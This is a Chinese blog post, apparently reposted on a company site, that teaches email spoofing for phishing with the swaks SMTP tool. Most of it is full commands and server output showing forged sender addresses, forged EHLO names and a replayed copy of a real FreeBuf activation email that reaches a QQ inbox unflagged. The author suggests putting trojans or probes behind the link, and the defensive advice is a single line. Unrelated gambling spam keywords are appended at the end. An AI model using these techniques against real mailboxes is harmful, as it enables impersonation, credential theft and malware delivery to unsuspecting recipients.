歡迎訪問 湖北靜靜網絡科技有限公司

揭秘釣魚郵件:黑客是如何進行郵件偽造的?
發布時間:2017-09-07 瀏覽:82

免責聲明:本站提供安全工具、程序(方法)可能帶有攻擊性,僅供安全研究與教學之用,風險自負!

現如今的釣魚郵件都是通過注冊相似的郵箱,或者設置郵箱的顯示名稱,盼著被害人有看走眼的那一刻,輕信郵件的內容。這種方法需要一定的社工技巧,以及誘導性的語言來誘使被害人上鉤。但是對于有一定的經驗以及眼力的人來說,還是可以識破騙子的伎倆。

下面我要介紹的這款工具可以最大程度的欺騙你的郵箱,更不要提你的眼睛。當然,此方法不是適用于任何郵箱,畢竟每種郵箱的過濾機制都不相同。gmail在這方面就做的不錯。

Swaks - SMTP界的瑞士軍刀

安裝:kali中自帶,或者從作者網頁下載

基本用法:

swaks –to <要測試的郵箱>         用來測試郵箱的連通性

[email protected]:~# swaks --to [email protected].com === Trying mx3.qq.com:25... === Connected to mx3.qq.com. <-  220 newmx59.qq.com MX QQ Mail Server  -> EHLO kali <-  250-newmx59.qq.com <-  250-SIZE 73400320 <-  250-STARTTLS <-  250 OK  -> MAIL FROM:<[email protected]> <-  250 Ok  -> RCPT TO:<[email protected].com> <-  250 Ok  -> DATA <-  354 End data with <CR><LF>.<CR><LF>  -> Date: Tue, 05 Jan 2016 23:15:11 -0500  -> To: [email protected].com  -> From: [email protected]  -> Subject: test Tue, 05 Jan 2016 23:15:11 -0500  -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/  ->   -> This is a test mailing  ->   -> . <** 550 Mail content denied. http://service.mail.qq.com/cgi-bin/help?subtype=1&&id=20022&&no=1000726  -> QUIT <-  221 Bye === Connection closed with remote host.

前面都返回250ok,說明該郵箱存在,并且可以正常收信。最后可以看到qq郵箱返回550錯誤,qq官方給出的出錯原因:該郵件內容涉嫌大量群發,并且被多數用戶投訴為垃圾郵件。

我們可以繼續對郵件進行偽造,來繞過qq郵箱的判斷

比如:

swaks --to [email protected].com --from [email protected].com --ehlo freebuf.com --body hello --header "Subject: hello"

其中:

–from <要顯示的發件人郵箱>

–ehlo <偽造的郵件ehlo頭>

–body <郵件正文>

–header <郵件頭信息,subject為郵件標題>

[email protected]:~# swaks --to [email protected].com --from [email protected].com --ehlo freebuf.com --body hello --header "Subject: hello" === Trying mx3.qq.com:25... === Connected to mx3.qq.com. <-  220 newmx.qq.com MX QQ Mail Server  -> EHLO freebuf.com <-  250-newmx.qq.com <-  250-SIZE 73400320 <-  250-STARTTLS <-  250 OK  -> MAIL FROM:<[email protected].com> <-  250 Ok  -> RCPT TO:<[email protected].com> <-  250 Ok  -> DATA <-  354 End data with <CR><LF>.<CR><LF>  -> Date: Tue, 05 Jan 2016 23:23:09 -0500  -> To: [email protected].com  -> From: [email protected].com  -> Subject: hello  -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/  ->   -> hello  ->   -> . <-  250 Ok: queued as   -> QUIT <-  221 Bye === Connection closed with remote host.

在你ip沒有被qq郵箱band的情況下,郵件可以正常發送,返回250 ok。

到這一步基本上可以滿足偽造郵件的要求了,但是qq郵箱會有安全提示,不過在不注意的情況下,基本上普通用戶會輕信郵件中的內容。

高級用法:

使用swaks其實還可以進行更高級的郵件偽造,幾乎可以偽造郵件中的每一個參數。

–data <源郵件>

首先,我們需要一份正常的郵件

點擊顯示郵件原文,把原文復制出來,保存為email.txt

其中的received可以都刪除,該項為接收信息,發信中不需要。to項也可以刪除,可以直接用swaks –to來代替。

注意不要忘了加–from 否則qq郵箱會報由kali代發……

swaks --data ./Desktop/email.txt --to [email protected].com --from [email protected].com

=== Trying mx3.qq.com:25... === Connected to mx3.qq.com. <-  220 newmx.qq.com MX QQ Mail Server  -> EHLO kali <-  250-newmx.qq.com <-  250-SIZE 73400320 <-  250-STARTTLS <-  250 OK  -> MAIL FROM:<[email protected].com> <-  250 Ok  -> RCPT TO:<[email protected].com> <-  250 Ok  -> DATA <-  354 End data with <CR><LF>.<CR><LF>  -> X-QQ-mid: bizesmtp1t1452053499t679t108  -> X-QQ-SSF: A0100000002000F16x90000A0000000  -> X-QQ-FEAT: JN+C/NT9bLPRA1qtkTz2XI2YtLAH2K0SriLtB4o1q8I8MwPIq85lzXVAE4t7b  ->  OaepuNhlRjNMuNhLJH2pbIQ3JkVf4MP4TXQi2HVPIG8N8dUf6GgxSJyMKya1U+CgOSvNgnP  ->  bbplbVZjkAVzVuoZOc03UetuyeF1A3SpS70fm7O8nzDqx918Tpsf+n3dlMN6UaAEV3SJycL  ->  1JuHYi2/yTQ7J6XJ4bMhJRRbRROkDmpNEgqGw1Sfo66A/oJUz0rf4tLEr7HgNuls18LrqZV  ->  jYfpcX5wglT4lxLNkHZRNBshk=  -> Date: Wed, 6 Jan 2016 12:11:39 +0800  -> Return-Path: [email protected].com  -> From: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDmnI3liqHlm6LpmJ8=?= <[email protected].com>  -> Subject: =?utf-8?B?RnJlZUJ1Zi/mvI/mtJ7nm5LlrZDotKbmiLfmv4DmtLvpgq7ku7Y=?=  -> Message-ID: <[email protected].tophant.com>  -> X-Priority: 3  -> X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)  -> MIME-Version: 1.0  -> Content-Type: multipart/alternative;  ->  boundary="b1_34db99d2b030c0f7b34bd2c6beca9666"  ->   ->   -> --b1_34db99d2b030c0f7b34bd2c6beca9666  -> Content-Type: text/plain; charset = "utf-8"  -> Content-Transfer-Encoding: 8bit  ->   -> FreeBuf/????′???’?-?è′|??·??€?′?é?®???  ->   ->   -> --b1_34db99d2b030c0f7b34bd2c6beca9666  -> Content-Type: text/html; charset = "utf-8"  -> Content-Transfer-Encoding: 8bit  ->   -> 尊敬的FreeBuf/漏洞盒子用戶:  ->   您好,您可以點擊以下鏈接激活您的賬號:<BR><A href="https://account.tophant.com/register/activation/token/c5023007b72363de7085504cf922d0c6" target=_blank>https://account.tophant.com/register/activation/token/c5023007b72363de7085504cf922d0c6偽造成功,你還敢點這條鏈接么</A><BR><BR>本郵件由系統自動發出,請勿回復。  ->   -> 感謝您的使用。  -> FreeBuf/漏洞盒子管理團隊  ->   ->   ->   -> --b1_34db99d2b030c0f7b34bd2c6beca9666--  ->   -> . <-  250 Ok: queued as   -> QUIT <-  221 Bye === Connection closed with remote host.

發送成功,qq郵箱沒報垃圾郵件,也沒報有害。

偽造成功,這超鏈接可以換成你喜歡的各種探針啊,馬啊之類的,在加上一點社工技巧,在APT橫行的年代,自求多福吧。

解決辦法:遇到可疑郵件要查看源郵件,判斷發信人ip是否為可信任的ip。



網易企業郵箱郵—專注企業郵件云安全解決方案20年,值得信賴!國內首家支持Dmarc防釣魚郵件技術,并有7大護盾保證用戶的郵件安全暢游;是國內唯一一家活動國家權威機構頒發的最高安全認證的“EAL3+級別安全證書”的企業郵箱。

網易企業郵箱以豐富的運營經驗和強大的技術實力,專注于為企業提供安全易用的辦公解決方案,網易企業郵箱(qiye.163.com)企業客戶超過61萬家,終端用戶超過3600萬名,老客戶保持近90%的高續費率,成績驚人。

真钱麻将游戏i
篮球比分7m 拉粪车赚钱吗 乐赢彩票安卓 二分彩计划网站 彩票软件客户端购买 今日nba篮彩预测分析 3d试机号码 时彩后二稳赚霸 ic飞艇人工计划软件下载